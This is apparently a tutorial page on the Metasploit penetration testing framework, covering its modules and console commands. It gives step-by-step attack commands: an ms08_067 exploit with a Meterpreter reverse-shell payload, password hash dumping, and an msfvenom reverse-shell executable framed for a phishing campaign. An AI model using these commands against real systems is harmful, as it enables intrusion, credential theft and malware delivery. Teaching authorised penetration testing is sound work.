Metsploit
Metasploit Framework
Metasploit is an open-source penetration testing framework developed by Rapid7. It is widely used for developing and executing exploit code against a remote target machine. The framework provides tools to perform various tasks in penetration testing, such as information gathering, vulnerability scanning, exploitation, and post-exploitation.
Key Components of Metasploit
Modules:
Exploit Modules: Contains the code to exploit specific vulnerabilities.
Payload Modules: Includes code that runs on the target machine after exploitation (e.g., reverse shells).
Auxiliary Modules: Used for scanning, fuzzing, and other non-exploit functionality.
Post Modules: Used for post-exploitation activities on a compromised system.
Encoders: Used to encode payloads to avoid detection.
NOPs: No-operation instructions used to pad out payloads.
Meterpreter: An advanced, extensible payload that provides an interactive shell for executing commands on the target machine.
Database: Metasploit integrates with PostgreSQL to store scan results, exploitation attempts, and other data.
Armitage: A graphical user interface (GUI) for Metasploit, providing visual aids for managing sessions and exploits.
Common Use Cases for Metasploit
Vulnerability Scanning and Exploitation
Information Gathering
Post-Exploitation
Social Engineering
Web Application Testing
Wireless Attacks
Password Attacks
Evasion Techniques
Use Cases with Metasploit
1. Vulnerability Scanning and Exploitation
Example: Exploiting a known vulnerability in a Windows machine using the ms08_067_netapi
exploit.
Steps:
Launch Metasploit:
msfconsole
Search for the exploit:
search ms08_067
Select the exploit:
use exploit/windows/smb/ms08_067_netapi
Set the target:
set RHOST <target_ip>
Set the payload:
set payload windows/meterpreter/reverse_tcp set LHOST <your_ip> set LPORT 4444
Run the exploit:
exploit
2. Information Gathering
Example: Scanning a network for open ports and services.
Steps:
Launch Metasploit:
msfconsole
Use auxiliary scanner:
use auxiliary/scanner/portscan/tcp
Set the target range:
set RHOSTS 192.168.1.0/24
Run the scan:
run
3. Post-Exploitation
Example: Collecting password hashes from a compromised machine.
Steps:
Exploit the target and get a Meterpreter session:
exploit
Dump password hashes:
meterpreter > hashdump
4. Social Engineering
Example: Creating a malicious payload for a phishing campaign.
Steps:
Generate the payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your_ip> LPORT=4444 -f exe > payload.exe
Set up a listener:
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST <your_ip> set LPORT 4444 exploit
Detailed Metasploit Options
msfconsole
Basic Commands:
search <term>
: Search for exploits, payloads, and other modules.use <module_path>
: Load a specific module.show options
: Display options for the current module.set <option> <value>
: Set a specific option value.exploit
: Run the selected exploit module.run
: Run the selected auxiliary module.sessions -i <id>
: Interact with a specific session.
msfvenom
Usage:
-p <payload>
: Specify the payload to use.LHOST=<your_ip>
: Set the local host IP.LPORT=<your_port>
: Set the local port.-f <format>
: Specify the output format (e.g., exe, elf, raw).-o <output_file>
: Specify the output file name.
Example:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > payload.exe
References
Metasploit Documentation: Metasploit Docs
Metasploit Unleashed (Offensive Security): Metasploit Unleashed
Metasploit GitHub Repository: Metasploit GitHub
Exploit Database: Exploit DB
By leveraging Metasploit's powerful capabilities, penetration testers can identify and exploit vulnerabilities, gather crucial information, and perform detailed post-exploitation tasks to assess and improve the security posture of an organization.
Last updated
Was this helpful?